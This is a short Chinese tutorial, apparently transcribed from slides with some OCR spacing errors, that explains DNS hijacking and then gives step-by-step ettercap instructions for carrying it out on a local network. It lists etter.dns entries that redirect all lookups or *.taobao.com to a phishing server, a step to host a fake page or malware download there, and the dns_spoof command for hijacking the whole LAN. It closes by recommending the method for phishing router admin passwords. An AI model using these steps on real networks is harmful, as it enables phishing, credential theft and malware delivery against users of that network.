DNS劫持简介
DNS ( Domain Name System ,域名系
统) ,在互联网上作为域名和IP地址相互映射的
-个分布式数据库。DNS劫持又称域名劫持,是
指在劫持的网络范围内拦截域名解析的请求，分
析请求的域名,把审查范围以外的请求放行,或
者返回假的IP地址或者什么都不做使请求失去响
应,其效果就是对特定的网络不能反应或访问的
是假网址。
DNS被劫持后，常见的攻击行为主要有：
网络钓鱼、干扰用户正常访问网络、威胁用户账号
信息及财产安全等。

使用ettercap进行DNS劫持
网关192.168.0.1
目标192.168.0.205
本机192.1 68.0.203
钓鱼服务器192.168.0.207
典型步骤:
1编辑ettercap的规则文件,修改DNS解析(最末端)
nano /etc/ettercap/etter.dns

• A 192.168.0.207 把所有解析劫持到此IP
  或
  *.taobao.com A 192.168.0.207添加正向解析
  *taobao.com PTR 192.1 68.0.207添加反向解析
  2.在钓鱼服务器搭建网页或者恶意软件下载
  3.使用ettercap及dns_ spoof插件进行全网劫持
  ettercap -Tq-i eth0 -P dns_ spoof /// ///
  可以在cmd下使用ipconfig/flushdns命令刷新DNS缓存
  也可使用图形界面进行劫持
  可以成为钓鱼获取无线路由器管理登录密码的方法补充